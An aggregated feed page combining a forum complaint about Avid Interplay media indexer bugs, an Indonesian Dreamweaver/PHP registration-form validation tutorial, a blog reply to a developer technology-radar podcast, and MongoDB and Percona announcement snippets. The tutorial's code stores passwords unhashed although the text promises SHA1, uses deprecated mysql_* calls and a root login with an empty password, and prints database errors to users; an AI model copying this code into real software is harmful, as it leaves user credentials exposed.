                    MongoDB media indexer(s) bug(s).        

          Help!

          Ever since Avid decided the classic media indexer database needs to be replaced by a mongodb database and is now running 2 databases on a mediaindexer, we are seeing all kinds of relinking weirdness in Interplay systems when dynamic relink is enabled. With the 7.3.1 version this has now reached the point where the system is no longer workable. Wrong format errors, consistency check failures, and MC presenting AAF's with wrong SourceID's causing transcode servers and MC consoldations to crash or use the wrong media. Only the daily 01:00 at night full re-index of all workspaces by the media indexer seems to bring most issues back in line.

          I have tried with support to address these issues but it's a slow process with mixed results. (The quality of support is not subject of this thread).

          I'm starting to wonder if the windows system locale on the editors, which on the systems here needs to be Greek for the use of Greek titles, is playing a role. I hope some Interplay users reading this, or L3 support/engineering can join this thread.

          But the whole thing starts with a piece of fuctionality inside MC I believe can't be right, while in a perfect world it shouldn't matter. If you enable dynamic relink and consolidate a sequence, you will see that the new sequence links to the new media. But if you the load the old sequence you will see that it now also links to the new media. If you disable dynamic relink this of course doesn't happen. But this even affects the original master clip that will now be segmented between the old and new clips and disabling dynamic relink does not restore the situation for that media. Closing bins and reopening and clearing bin memory sometimes affects behavior but most of the time MC needs to be restarted for some cached info to be 'forgotten'.

           

          Can anybody confirm?


                    Links for 2011-09-18 [del.icio.us]        

                    Form Registrasi dengan Validasi AJAX dan PHP        
          Anda mungkin sering jengkel dengan form yang telah Anda buat. Berharap form input email hanya diisi dengan email, tapi ternyata orang yang iseng memasukkan data bukan email, jengkel bukan? Belum lagi ketika pengunjung tidak mengisi data dan yang muncul hanya pesan error dari SQL. Panjang password dan username yang harusnya 6 karakter tapi ternyata banyak user yang memasukkan 4 karakter. Lalu bagaimana memberikan filter pada form yang Anda buat sehingga data yang diinput mendekati akurat? Note: Tutorial ini ditujukan bagi pengguna CS4 ke atas.
          Tutorial ini akan mengkombinasikan fungsi Spry (AJAX) yang dimiliki oleh Dreamweaver dan script PHP untuk memfilter data yang diinput oleh user. Dari tutorial ini Anda diharapkan dapat:
          1. Membuat form registrasi dengan filter AJAX/JavaScript
          2. Mengaktifkan form Insert Record
          3. Memfilter data sebelum masuk ke database

          Sebelum masuk ke tutorial ini, pastikan Anda telah mempelajari kedua tutorial ini:
          1. Membuat Site Definition di Dreamweaver CS5, dan
          2. Membuat koneksi database PHP MySQL dengan Dreamweaver CS5

          Kebutuhan database MySQL

          Dalam contoh ini, Anda akan membuat tabel users dengan kolom-kolom berikut ini:
          • id, merupakan primary key
          • nama, field untuk menyimpan data nama
          • email, field untuk menyimpan data email
          • username, field untuk menyimpan data email. Diharapkan panjang username minimal 6 karakter.
          • password, field untuk menyimpan data password. Diharapkan panjang password minimal 6 karakter dan enkripsi SHA1.
          • tanggal, untuk menyimpan tanggal update data
          Berikut ini adalah SQL dari tabel users.


          CREATE TABLE IF NOT EXISTS `users` (
          `id` int(11) NOT NULL AUTO_INCREMENT,
          `nama` varchar(64) NOT NULL,
          `email` varchar(64) NOT NULL,
          `username` varchar(64) NOT NULL,
          `password` varchar(64) NOT NULL,
          `tanggal` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
          PRIMARY KEY (`id`)
          ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;


          Struktur File dan Form registrasi

          Tutorial ini menggunakan file yang disimpan dengan nama validasi_data.php. Sedangkan file style.css disimpan dalam folder css. Berikut struktur folder dan file tutorial kali ini:
          • Connections, folder untuk menyimpan file koneksi database: koneksi.php.
          • css, folder untuk menyimpan file style.css
          • validasi_data.php adalah file yang akan digunakan untuk latihan.
          Java Web Media: Web Design Course Depok

          Koneksi database: koneksi.php
          File ini berfungsi untuk mengkoneksikan database:

          <?php
          # FileName="Connection_php_mysql.htm"
          # Type="MYSQL"
          # HTTP="true"
          $hostname_koneksi = "localhost";
          $database_koneksi = "tutorial_blog";
          $username_koneksi = "root";
          $password_koneksi = "";
          $koneksi = mysql_pconnect($hostname_koneksi, $username_koneksi, $password_koneksi) or trigger_error(mysql_error(),E_USER_ERROR);
          ?>


          File style.css untuk mengatur tampilan halaman web
          Berikut adalah file tersebut:


          body {
          background-color: #063;
          margin: 0px;
          padding: 0px;
          }
          form {
          background-color: #E7E7E7;
          padding: 20px;
          border: thin solid #CECECE;
          border-radius: 5px;
          }
          label {
          font-size: 14px;
          font-weight: bold;
          text-transform: capitalize;
          display: block;
          }
          input {
          padding: 5px 10px;
          }
          h1 {
          padding-bottom: 10px;
          border-bottom: solid thin #D4D4D4;
          font-size: 18px;
          }
          a, a:visited {
          text-decoration: none;
          }
          a:hover {
          color: #900;
          }
          #wrapper {
          font-family: Tahoma, Geneva, sans-serif;
          background-color: #FFF;
          margin: auto;
          padding: 20px 30px;
          height: auto;
          width: 960px;
          border-right-width: 5px;
          border-right-style: solid;
          border-right-color: #CCC;
          border-bottom-width: 5px;
          border-left-width: 5px;
          border-bottom-style: solid;
          border-left-style: solid;
          border-bottom-color: #CCC;
          border-left-color: #CCC;
          border-bottom-left-radius: 5px;
          border-bottom-right-radius: 5px;
          }
          img {
          max-width: 900px;
          padding: 10px;
          border: solid thin #F9F;
          background-color: #FFC;
          height: auto;
          }
          .warning {
          background-color: #FCF;
          color: #900;
          padding: 5px 10px;
          border: solid thin #900;
          border-radius: 5px;
          }

          File latihan validasi_data.php

          File ini adalah file utama yang akan dikerjakan dalam tutorial ini, berikut adalah script file tersebut:

          Java Web Media: Graphic Design Course Depok

          <!DOCTYPE HTML>
          <html>
          <head>
          <meta charset="utf-8">
          <title>Untitled Document</title>
          <link href="css/style.css" rel="stylesheet" type="text/css">
          </head>
          <body>
          <div id="wrapper">
          <h1><a href="http://www.javawebmedia.com">Home</a> | <a href="http://www.javawebmedia.com">About Java Web Media</a> | <a href="http://www.javawebmedia.com">Course</a> | <a href="http://www.javawebmedia.com">Contact Us</a></h1>
          <h2>Registration form</h2>
          <p>Form registrasi ada di sini</p>
          </div>
          </body>
          </html>

          Membuat form input data

          Langkah selanjutnya adalah membuat form untuk memasukkan data. Lihat gambar di atas.
          1. Ubah tampilan Workspace Anda menjadi Design View. Lihat gambar di atas
          2. Seleksi tulisan Registrasi form ada di sini. Hapus tulisan tersebut.
          3. Klik Insert > Form > Form
          4. Klik Insert > Spry > Spry Validation Textfield.
          5. Pada kolom ID: nama dan Label: Nama Anda:. Klik OK.
            Java Web Media: Web Programming Course Depok

            Java Web Media: Web Programming Course Depok

          6. Letakkan kursor Anda di samping kanan form input nama lalu tekan Enter.
          7. Klik Insert > Spry > Spry Validation Textfield. Pada kolom ID: email dan Label: Alamat email Anda:. Klik OK.
          8. Letakkan kursor Anda di samping kanan form input email, lalu tekan Enter.
          9. Klik Insert > Spry > Spry Validation Textfield. Pada kolom ID: username dan Label: Username Anda:. Klik OK.
          10. Letakkan kursor Anda di samping kanan form input username, lalu tekan Enter.
          11. Klik Insert > Spry > Spry Validation Password (fitur ini baru ada pada Dreamweaver CS4 ke atas). Pada kolom ID: password dan Label: Password Anda:. Klik OK.
          12. Letakkan kursor Anda di samping kanan form input password, lalu tekan Enter.
          13. Klik Insert > Form > Button. Pada kolom ID: submit. Biarkan Label tetap kosong lalu klik OK.
          14. Klik pada tombol Submit yang sudah muncul lalu copy dan letakkan di samping tombol Submit.
            Web Design in Depok? Java Web Media

          15. Klik tombol Submit kedua yang baru saja Anda paste, lalu melalui panel Properties ubah menjadi Reset form.
          16. Simpan hasil pekerjaan Anda. Jika ada pop-up menu keluar untuk menanyakan apakah file Spry akan disimpan, klik OK.
          Java Web Media: Your Web Solution

          Memilih type dan panjang data yang ingin difilter menggunakan AJAX/Spry

          Pada langkah ini, Anda akan belalajar menggunakan fasilitas Spry yang disediakan oleh Dreamweaver. Fitur spry ini bekerja selayaknya AJAX. Ketika Anda bekerja menggunakan mode Design View, maka setiap kali Anda melakukan hover (atau mengarahkan kursor di atas form yang tadi Anda beri fasilitas spry, maka Dreamweaver akan langsung menampilkan notifikasi berwarna biru pada masing-masing spry.
          Fitur spry tidak terlalu susah untuk dipelajari, dan mudah untuk Anda gunakan.
          Klik Notifikasi atau Pop-up menu tersebut, maka fasilitas pengaturan Spry akan muncul di jendela Properties yang terletak di bagian bawah work space Anda. Pada contoh di bawah dipilih pada Spry Textfield2.
          Java Web Media: Your Web Solution

          Beberapa fitur yang harus Anda pahami antara lain:
          • Type, adalah type data yang akan Anda validasi. Dalam contoh ini Email Address
          • Format, adalah format penulisan. Dalam contoh ini tidak digunakan
          • Patern, pola dari teks. Dalam contoh ini tidak digunakan
          • Hint, akan menampilkan teks panduan bagi pengunjung web tentang type dan format data seperti apa yang ingin dimasukkan.
          • Min chars, minimal karakter yang harus diketik
          • Max chars, maksimal karakter yang boleh dimasukkan.
          • Validate on, adalah kapan validasi data harus diaktifkan. Secara Default Dreamweaver akan memilih Submit. Dalam contoh ini dipilih ketiganya (Blur dan Change) juga diaktifkan. Ini artinya fitur spry akan langsung menampilkan pesan error meskipun data yang Anda ketik belum selesai.
          • Required, artinya wajib atau harus diisi. Jika form input tidak wajib diisi, maka Anda bisa memilih untuk meng-Unchecked-nya.
          Java Web Media: Web Design Company in Depok

          Dengan menggunakan fitur spry di atas, lakukan pengaturan filter data seperi berikut ini. Dalam contoh ini, berikut beberapa filter data yang akan diberikan di setiap form input data:
          • nama, minimal 5 huruf dan harus diisi (Required). Validate on: Blur and Change aktif.
          • email, type harus alamat email, dan hint-nya: contact@javawebmedia.com. Validate on: Blur and Change aktif.
          • username, minimal menggunakan 6 karakter/huruf dan maximal 16 karakter/huruf. Validate on: Blur and Change aktif.
          • password, minimal 6 karakter dan maximal 32 karakter. Validate on: Blur and Change aktif.
          • Simpan kembali pekerjaan Anda

          Mengubah tampilan Spry melalui CSS

          Jika Anda perhatikan, lay out bawaan Spry sangatlah tidak menarik. Pesan peringatan muncul dengan warna merah dan bingkai merah. Pada langkah ini, Anda akan belajar melakukan kustomisasi tampilan CSS.

          SpryValidationTextfield.css

          Java Web Media: Web Design Company in Depok

          Jika Anda menggunakan Dreamweaver CS4 ke atas, klik file SpryValidationTextfield.css yang ada pada menu related file. Lalu pada baris kode ke-33 lakukan perubahan sehingga menjadi:

          textfieldRequiredState .textfieldRequiredMsg, 
          .textfieldInvalidFormatState .textfieldInvalidFormatMsg,
          .textfieldMinValueState .textfieldMinValueMsg,
          .textfieldMaxValueState .textfieldMaxValueMsg,
          .textfieldMinCharsState .textfieldMinCharsMsg,
          .textfieldMaxCharsState .textfieldMaxCharsMsg
          {
          display: block;
          color: #CC3333;
          }
          Lalu pada baris ke-73 yang semula adalah sebagai berikut:
          .textfieldHintState input, input.textfieldHintState { /*color: red !important;*/ }Ubah menjadi:
          .textfieldHintState input, input.textfieldHintState { /*color: red !important;*/ color: #CCC; }



          Simpan kembali file SpryValidationTextfield.css Anda. Anda dapat melakukan perubahan pada SpryValidationPassword.css dengan cara yang kurang lebih sama. Berikut hasil kustomisasi dari layout file Spry tadi.
          Java Web Media: Web Design Company Depok

          Mengaktifkan form Insert Record

          Anda telah membuat filter data yang akan dientry pada tingkat dasar. Fitur Spry ini akan sangat berguna jika user tidak mematikan fitur JavaScript pada browser yang mereka gunakan. Jika fitur JavaScript mereka disable atau dinonaktifkan, maka fungsi Spry tidak akan ada gunanya.

          Java Web Media: Web Design Course Depok

          Langkah selanjutnya adalah mengaktifkan form Insert Record. Berikut langkah-langkahnya:
          1. Klik kembali pada file Source code di Dreamweaver Anda (lihat gambar).
          2. Klik Insert > Data Objects > Insert Record > Insert Record
          3. Submit values from: form1
          4. Connections: koneksi
          5. Insert table: users
          6. Columns:, pastikan hanya id dan tanggal yang tidak mendapatkan value.
          7. After inserting, go to: validasi_data.php
          8. Klik OK
          9. Simpan kembali hasil pekerjaan Anda.
          Anda telah berhasil mengaktifkan form Insert Record.

          Validasi Server Side menggunakan PHP

          Validasi atau filter Server Side adalah langkah kedua setelah validasi JavaScript/AJAX Anda didisable oleh user.
          Di sekitar baris kode ke-37, Anda akan menemukan kode ini:
          $editFormAction = $_SERVER['PHP_SELF'];

          if (isset($_SERVER['QUERY_STRING'])) {

          $editFormAction .= “?” . htmlentities($_SERVER['QUERY_STRING']);

          }

          Tekan Enter setelah kode tersebut, lalu tambahkan kode ini:

          $editFormAction .= "?" . htmlentities($_SERVER['QUERY_STRING']);
          }
          //Chek jika terjadi error
          $error = array();
          $MM_flag="MM_insert";
          // Validasi input
          if (isset($_POST[$MM_flag])) {
          //Check panjang nama, jika kosong atau kurang dari 5 ERROR
          if((strlen($_POST['nama']) < 5)) {
          $error['nama'] = "Nama harus diisi dengan minimal 5 karakter";
          }
          // Check alamat email
          $checkEmail = '/^[^@]+@[^\s\r\n\'";,@%]+$/';
          if (!preg_match($checkEmail, trim($_POST['email']))) {
          $error['email'] = "Alamat email salah";
          }
          //Check panjang username
          $_POST['username'] = trim($_POST['username']);
          if(strlen($_POST['username']) < 6 || strlen($_POST['username']) > 16) {
          $error['username'] = "Username minimal 6 karakter dan maksimal 16 karakter";
          }
          // Check password
          $_POST['password'] = trim($_POST['password']);
          if(strlen($_POST['password']) < 6 || strlen($_POST['password']) > 32){
          $error['password'] = "Password 6 karakter dan maksimal 32 karakter";
          }
          }
          // Jika tidak terjadi error
          if(!$error) {
          if ((isset($_POST["MM_insert"])) && ($_POST["MM_insert"] == "form1")) {

          Lalu pada baris ke-82 yang semula seperti ini:
          }
          header(sprintf("Location: %s", $insertGoTo));
          }


          Lalu ubah menjadi:


          header(sprintf("Location: %s", $insertGoTo));
          }
          $_POST = array();
          }

          Simpan kembali hasil pekerjaan Anda

          Menampilkan pesan error

          Langkah selanjutnya adalah menampilkan pesan error jika type data yang dikirimkan oleh pengunjung ternyata tidak memenuhi kriteria yang Anda tetapkan.

          Cari kode di bawah ini:


          <h2>Registration form</h2> <form name="form1" method="POST" action="<?php echo $editFormAction; ?>">

          Lalu ubah menjadi:

          <h2>Registration form</h2>

          <?php if($error) { ?>
          <p class="warning">
          <strong>Ada kesalahan dalam proses pengisian data:</strong><br/>
          <?php foreach($error as $peringatan) { ?>
          - <?php echo $peringatan; ?><br/>
          <?php } ?>
          </p>
          <?php } ?>
          <form name="form1" method="POST" action="<?php echo $editFormAction; ?>">

          Untuk melakukan pengetesan pada level Server Side ini, pastikan Anda mendisable fungsi JavaScript, lalu klik tombol Submit.

          Java Web Media: Web Design Company in Depok

          Java Web Media: Web Design Company in Depok
          Anda telah menyelesaikan paket dasar tutorial validasi data. Selamat mencoba.
          Hasil akhir Script adalah sebagai berikut:

          <?php require_once('Connections/koneksi.php'); ?>
          <?php
          if (!function_exists("GetSQLValueString")) {
          function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "")
          {
          if (PHP_VERSION < 6) {
          $theValue = get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue;
          }
          $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue);
          switch ($theType) {
          case "text":
          $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
          break;
          case "long":
          case "int":
          $theValue = ($theValue != "") ? intval($theValue) : "NULL";
          break;
          case "double":
          $theValue = ($theValue != "") ? doubleval($theValue) : "NULL";
          break;
          case "date":
          $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
          break;
          case "defined":
          $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue;
          break;
          }
          return $theValue;
          }
          }
          $editFormAction = $_SERVER['PHP_SELF'];
          if (isset($_SERVER['QUERY_STRING'])) {
          $editFormAction .= "?" . htmlentities($_SERVER['QUERY_STRING']);
          }
          //Chek jika terjadi error
          $error = array();
          $MM_flag="MM_insert";
          // Validasi input
          if (isset($_POST[$MM_flag])) {
          //Check panjang nama
          if((strlen($_POST['nama']) < 5)) {
          $error['nama'] = "Nama minimal 5 karakter";
          }
          // Check alamat email
          $checkEmail = '/^[^@]+@[^\s\r\n\'";,@%]+$/';
          if (!preg_match($checkEmail, trim($_POST['email']))) {
          $error['email'] = "Alamat email salah";
          }
          //Check panjang username
          $_POST['username'] = trim($_POST['username']);
          if(strlen($_POST['username']) < 6 || strlen($_POST['username']) > 16) {
          $error['username'] = "Username minimal 6 karakter dan maksimal 16 karakter";
          }
          // Check password
          $_POST['password'] = trim($_POST['password']);
          if(strlen($_POST['password']) < 6 || strlen($_POST['password']) > 32){
          $error['password'] = "Password 6 karakter dan maksimal 32 karakter";
          }
          }
          // Jika tidak terjadi error
          if(!$error) {
          if ((isset($_POST["MM_insert"])) && ($_POST["MM_insert"] == "form1")) {
          $insertSQL = sprintf("INSERT INTO users (nama, email, username, password) VALUES (%s, %s, %s, %s)",
          GetSQLValueString($_POST['nama'], "text"),
          GetSQLValueString($_POST['email'], "text"),
          GetSQLValueString($_POST['username'], "text"),
          GetSQLValueString($_POST['password'], "text"));
          mysql_select_db($database_koneksi, $koneksi);
          $Result1 = mysql_query($insertSQL, $koneksi) or die(mysql_error());
          $insertGoTo = "validasi_data.php";
          if (isset($_SERVER['QUERY_STRING'])) {
          $insertGoTo .= (strpos($insertGoTo, '?')) ? "&" : "?";
          $insertGoTo .= $_SERVER['QUERY_STRING'];
          }
          header(sprintf("Location: %s", $insertGoTo));
          }
          $_POST = array();
          }
          ?>
          <!DOCTYPE HTML>
          <html>
          <head>
          <meta charset="utf-8">
          <title>Untitled Document</title>
          <link href="css/style.css" rel="stylesheet" type="text/css">
          <script src="SpryAssets/SpryValidationTextField.js" type="text/javascript"></script>
          <script src="SpryAssets/SpryValidationPassword.js" type="text/javascript"></script>
          <link href="SpryAssets/SpryValidationTextField.css" rel="stylesheet" type="text/css">
          <link href="SpryAssets/SpryValidationPassword.css" rel="stylesheet" type="text/css">
          </head>
          <body>
          <div id="wrapper">
          <h1><a href="http://www.javawebmedia.com">Home</a> | <a href="http://www.javawebmedia.com">About Java Web Media</a> | <a href="http://www.javawebmedia.com">Course</a> | <a href="http://www.javawebmedia.com">Contact Us</a></h1>
          <h2>Registration form</h2>

          <?php if($error) { ?>
          <p class="warning">
          <strong>Ada kesalahan dalam proses pengisian data:</strong><br/>
          <?php foreach($error as $peringatan) { ?>
          - <?php echo $peringatan; ?><br/>
          <?php } ?>
          </p>
          <?php } ?>
          <form name="form1" method="POST" action="<?php echo $editFormAction; ?>">
          <span id="sprytextfield1">
          <label for="nama">Nama Anda:</label>
          <input type="text" name="nama" id="nama">
          <span class="textfieldRequiredMsg">A value is required.</span><span class="textfieldMinCharsMsg">Minimum number of characters not met.</span></span>
          <p><span id="sprytextfield2">
          <label for="email">Alamat email Anda:</label>
          <input type="text" name="email" id="email">
          <span class="textfieldRequiredMsg">A value is required.</span><span class="textfieldInvalidFormatMsg">Invalid format.</span></span></p>
          <p><span id="sprytextfield3">
          <label for="username">Username Anda:</label>
          <input type="text" name="username" id="username">
          <span class="textfieldRequiredMsg">A value is required.</span><span class="textfieldMinCharsMsg">Minimum number of characters not met.</span><span class="textfieldMaxCharsMsg">Exceeded maximum number of characters.</span></span></p>
          <p><span id="sprypassword1">
          <label for="password">Password Anda:</label>
          <input type="password" name="password" id="password">
          <span class="passwordRequiredMsg">A value is required.</span><span class="passwordMinCharsMsg">Minimum number of characters not met.</span><span class="passwordMaxCharsMsg">Exceeded maximum number of characters.</span></span></p>
          <p>
          <input type="submit" name="submit" id="submit" value="Submit">
          <input type="reset" name="submit2" id="submit2" value="Reset">
          </p>
          <input type="hidden" name="MM_insert" value="form1">
          </form>
          <p>&nbsp;</p>
          </div>
          <script type="text/javascript">
          var sprytextfield1 = new Spry.Widget.ValidationTextField("sprytextfield1", "none", {minChars:5, validateOn:["blur", "change"]});
          var sprytextfield2 = new Spry.Widget.ValidationTextField("sprytextfield2", "email", {validateOn:["blur", "change"], hint:"contact@javawebmedia.com"});
          var sprytextfield3 = new Spry.Widget.ValidationTextField("sprytextfield3", "none", {minChars:6, maxChars:16, validateOn:["blur", "change"]});
          var sprypassword1 = new Spry.Widget.ValidationPassword("sprypassword1", {minChars:6, maxChars:32, validateOn:["blur", "change"]});
          </script>
          </body>
          </html> 
           

           
           
           
           Sumber

                    Mapping for the busy cartographer: today moving dots        
          This article describes how to make a quick map using some nice services we have at our hands. Nowadays almost everyone can create a maps using services like CartoDB, Mapbox, uMap or even Google My Maps. In this case I’ll show how I used the incredible flexibility of CartoDB to combine some Postgres/PostGIS SQL with CartoCSS […]
                    On My Radar?        

          Mark Mandel and Kai Koenig were recently inspired by the ThoughtWorks "Technology Radar" to create their own, which they featured in episode 31 of 2 Devs Down Under, their conversational podcast. Because they're both somewhere along the spectrum of CFML-to-ex-CFML developers and have worked with Flex etc, their opinions on various technologies are probably of more interest to other CFML developers than the original ThoughtWorks radar. This podcast episode is longer than usual - nearly two hours - and Mark and Kai would love to hear your responses in comments. I decided my response was a bit too long to post as a comment, so I am turning it into a blog post instead.

          The first category they covered is "Techniques" and their top two items are things that are top of my list as well: devops (infrastructure as code) and automated deployment. I've been advocating automation of builds and deployments for a long time and I'm always looking for better ways to manage these tasks. At World Singles, we've been using Ant for our build process and we're reaching the limits of what we can do easily so we're looking at code-based solutions instead, and we're also looking at devops via Pallet (Clojure-based specification of servers and software configuration). On the flipside, they advise "hold" on hand built infrastructure and one-off deployments - and I completely agree with them on that.

          Also in their "adopt" or "trial" sections for techniques are SPA (Single Page Applications) and modular development with JavaScript. As we move into a world of mobile web applications, MVC on the client side is inevitable and something we're going to need to live with. JavaScript is not a language well-suited to large scale development and the lack of modules or namespaces has led to a number of workaround techniques and clever libraries (covered later). We'll eventually get native modules in JavaScript but, like many other issues with JavaScript, we're hamstrung by older browsers so adoption will be painfully slow. I'd recommend looking at other compile-to-JS languages that have native support for modular development and can bury the JS issues in a cross-browser manner (my personal preference is ClojureScript, of course, and that will come up again later).

          Finally in techniques, they have Agile in adopt and Waterfall in hold. Two decades ago I worked in a process/QA-focused company that advocated a "V" process to replace Waterfall in the enterprise, and for the last decade I would have advocated Agile instead of Waterfall, so I'm with Kai and Mark on that. I know Agile still has its detractors but I don't think Waterfall still has any supporters left?

          Next, Kai and Mark move on to "Platform" and perhaps controversially put Apache, IIS and MySQL into the "hold" section. Given Oracle's track record, I can certainly understand their concerns with MySQL - and at work we've been bumping heads with its performance limitations and would agree that it is not easy to provide robustness (in terms of replication and failover). As someone who won't put Windows servers into production, I can only smile at IIS being in this section but I was surprised by Apache's inclusion. The web server to "adopt" they say is Nginx and I'm about to start assessing that so I won't argue overall. Also in their "adopt" / "trial" / "assess" sections are a broad spread of no-SQL databases - which I also agree with. Mark recommends PostgreSQL on the grounds that he's seeing a lot of recommendations for it. I've looked at it a couple of times and, to me, it seems to have all the complexity of Oracle, combined with some very quirky non-standard behavior - but, like Mark, I keep hearing good things about it. Personally, I'd rather move fully onto MongoDB at this point because of the flexibility it provides in terms of schemas and data storage, combined with simple (and solid) replication and sharding for robustness and scalability. The final item on Mark's "assess" list that I'd call out is Hazelcast which is a very impressive piece of technology: it is a library that provides distributed versions of several standard Java data structures. This makes it insanely easy to set up distributed caches using the same data structures you're already using in your application, so you hardly need to make any code changes to be able to leverage clustering. Definitely worth a look.

          Next we move onto "Tools" and Mark, in particular, recommends a lot of things that I am not familiar enough with to agree or disagree. Mark recommends Ansible and Vagrant where I'd probably lean toward Pallet and VMFest but, given Ansible is Python-based, I suspect Ansible would be a lot more approachable for many developers. Kai puts the Brackets editor from Adobe in the "trial" section which is an interesting choice. As a lightweight editor for HTML / CSS / JS, it's probably got a lot going for it but I'm keeping my eye on LightTable which, like Brackets, is also based on CodeMirror but offers some very interesting live evaluation options for JavaScript, Python and Clojure (and ClojureScript). Like Brackets, LightTable is designed to be extensible but full plugin support is something we'll get in the upcoming 0.5 release which is when I think LightTable will become very, very exciting! Both Kai and Mark put Eclipse in the "hold" section (which I agree with - it's become pretty bloated and plugin version compatibility can be a problem, esp. when Adobe's ColdFusion Builder is based on such an old build of Eclipse). Strangely - to me - they both put IntelliJ in "adopt". I've tried IntelliJ several times and I really can't get on with it. I find it to be every bit as bloated and complex as Eclipse, but far less usable. I can sympathize far more with Kai's recommendation of Sublime Text although, again, I just can't get on with it. I find it to be fussy and counter-intuitive in many areas, although a couple of my team members love it. My weapon of choice for editing is Emacs but I'm not going to try to convince everyone to use it. If you're doing Clojure development, it's probably the best-supported option, and it is extremely powerful but at the same time, quite lightweight.

          Along with Eclipse, Kai and Mark throw quite a few other tools under the bus: FTP for deployment, Ant, Maven, and Dreamweaver. If you're doing server-side development, I have to agree with all of these. I use Ant but really don't like it, I have to use Maven occasionally for Clojure contrib projects and don't like that either - do we really need to be programming in XML? I think Dreamweaver is probably still a great choice for front end design work but CSS and JS support has improved so much in so many lightweight, open source editors that I find it hard to get enthusiastic about Dreamweaver even in that realm.

          Finally Mark and Kai move onto "Languages & Frameworks" and they have a lot of JS-related recommendations which... well, I just can't find it in myself to like JS. The more I work with it, the less I like it. I know it's ubiquitous but as far as I'm concerned, it deserves to be the assembler of the web and no more. There are an increasing number of compile-to-JS languages now that provide some compelling choices. If I was a Windows guy, I'd probably be pushing WebSharper and FunScript which both offer F#-to-JS compilation, built on top of TypeScript. A statically typed functional language is a good choice for targeting JavaScript and papering over its many flaws. For a more general functional language, ClojureScript offers Clojure-to-JS compilation and that will be my choice as we move into more complex JS territory at work I expect. Both Mark and Kai recommend Clojure, which I was pleased to see (of course). Mark also recommends JRuby and Kai recommends Python. I had both on my list of languages to learn but having spent some time with both of them (Ruby via "Programming Languages" on Coursera; Python via 10gen's MongoDB for Developers, and attending PyCon), I've taken Ruby off that list and plan to spend more time with Python, probably in a system scripting capacity.

          Perhaps of more interest to our audience is their position on CFML: Mark puts CFML in the "hold" section and Kai puts Adobe ColdFusion in the "hold" section but puts Railo in the "adopt" section. They have quite a discussion about this and I think this is the part of their podcast that should generate the most comments...

          This also matches with Mark being essentially "ex-CFML" whilst Kai is still "CFML". I'm not quite "ex-CFML" but I'm no longer really "CFML" either. I understand Mark's point of view - that no one in the world at large is going to start a project in CFML - but I'm somewhat fascinated by Kai's optimism and it makes me re-examine my own position on CFML. At World Singles we're using CFML for the View-Controller portion of our application and it still makes sense. We're using Railo but I have to admit that even Railo feels a bit bloated for the VC portion - because we're using such a small subset of CFML at this point. That said, CFML is a wonderful templating language, and script-based controllers are a decent way to glue any Model to your Views. I've previously said we wouldn't bother upgrading beyond Railo 3.3 yet we're in the process of standing up two new servers as upgrade replacements for two of our existing servers, and we've decided to deploy Java 7, Tomcat 7, and Railo 4 - and now will upgrade the third server (and QA and all our dev environments eventually) to the same. Which means we'll start using closures in CFML and it will continue to have a renewed lease on life for a while.

          Would I start a new greenfield project in CFML? Until recently I would probably have said "no" but now I'm not so sure. Would I ever start a new greenfield project in Adobe ColdFusion? No, that makes no sense at all in this age of free open source languages and frameworks. But Railo 4? It's a possibility. With their continued evolution of the language and the system's overall facilities (such as command line execution), I might just consider them for future projects... and continue using a hybrid of CFML for the View-Controller / container portion of the application, with Clojure for the Model. That was my big surprise after listening to Mark and Kai for two hours.


                    This article shows you how to create a MongoDB application using ZKGrails 2.2. Credits to Chanwit Kaewkasi.        
          At the end of this article, you will find yourself be able to create a simple MongoDB application with ZK and Grails.

                    Serverside Pagination with ZK, Spring Data MongoDB and Google Maps        

                    Ashish's 3rd small talk on mongoDB shows how to develop a non- relational database driven ZK app with Spring Data        
          Ashish's third small talk on mongoDB guides users through how you can develop a non- relational database driven ZK app using Spring Data. For more information, please read here.

                    Ashish's 2nd small talk on mongoDB guides you through the development of a non- relational database driven ZK app using Morphia        
          Ashish's second small talk on mongoDB shows how users can develop a non-relational database driven ZK application using Morphia. For more detailed information, please read here.

                    Ashish has written a small talk on how to develop a non-relational database driven ZK app using mongoDB Java Driver        
          Ashish has written a small talk showing how developers can develop a non-relational database driven ZK application using mongoDB Java Driver. For more detailed information, please read here.

                    Percona Live Europe 2017 Sneak Peek Schedule Up Now! See Available Sessions!        
          Percona Live Europe 2017We are excited to announce that the sneak peek schedule for the Percona Live Open Source Database Conference Europe 2017 is up! The Percona Live Open Source Database Conference Europe 2017 is September 25 – 27, at the Radisson Blu Royal Hotel. The theme of Percona Live Europe 2017 is Championing Open Source Databases, with sessions on MySQL, MariaDB, MongoDB and […]
                    Percona Toolkit 3.0.4 is Now Available        
          Percona Server for MongoDBPercona announces the release of Percona Toolkit 3.0.4 on August 2, 2017. Percona Toolkit is a collection of advanced command-line tools that perform a variety of MySQL and MongoDB server and system tasks too difficult or complex for DBAs to perform manually. Percona Toolkit, like all Percona software, is free and open source. You download Percona Toolkit packages from the […]
                    Percona Server for MongoDB 3.4.6-1.7 is Now Available        
          Percona Server for MongoDB 3.4Percona announces the release of Percona Server for MongoDB 3.4.6-1.7 on August 2, 2017. Download the latest version from the Percona web site or the Percona Software Repositories. Percona Server for MongoDB is an enhanced, open source, fully compatible, highly-scalable, zero-maintenance downtime database supporting the MongoDB v3.4 protocol and drivers. It extends MongoDB with Percona Memory Engine and MongoRocks storage engine, as well as several enterprise-grade features: External […]
                    Group Replication: The Sweet and the Sour        
          Group ReplicationIn this blog, we’ll look at group replication and how it deals with flow control (FC) and replication lag.  Overview In the last few months, we had two main actors in the MySQL ecosystem: ProxySQL and Group-Replication (with the evolution to InnoDB Cluster).  While I have extensively covered the first, my last serious work on […]
                    Percona Server for MongoDB 3.4.6-1.6 is Now Available        
          Percona Server for MongoDB 3.4Percona announces the release of Percona Server for MongoDB 3.4.6-1.6 on July 27, 2017. Download the latest version from the Percona web site or the Percona Software Repositories. Percona Server for MongoDB is an enhanced, open source, fully compatible, highly-scalable, zero-maintenance downtime database supporting the MongoDB v3.4 protocol and drivers. It extends MongoDB with Percona Memory Engine and MongoRocks storage engine, as well as several enterprise-grade features: External […]
